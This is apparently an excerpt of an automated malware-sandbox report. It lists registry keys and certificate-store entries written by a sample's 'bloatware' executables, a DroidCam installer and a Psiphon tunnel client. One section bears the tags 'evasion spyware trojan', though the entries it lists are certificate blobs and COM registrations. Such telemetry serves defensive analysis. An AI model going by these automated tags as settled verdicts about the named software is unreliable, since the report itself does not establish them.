Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "10998" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B65CF41-9DB2-11EF-AE37-6A7FEBC734DB} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 C:\Windows\SysWOW64\reg.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\\bloatware\\3.exe\" -- \"%1\"" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\ = "URL:psiphon" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\URL Protocol C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\REQUEST C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136180000000100000010000000021dfb9b16b1303a97b0bf78cda68e46190000000100000010000000d2ad89d215fd92fee49a4c3941f6764a140000000100000014000000932ca752938ca1308712e92885d692a8c4ba68510f00000001000000200000004d0948e616196706e4aed75a88243863a88ff351afc50d0f9e948353618c011e040000000100000010000000a58d756a52cdd9c0488b755d46d4df71200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
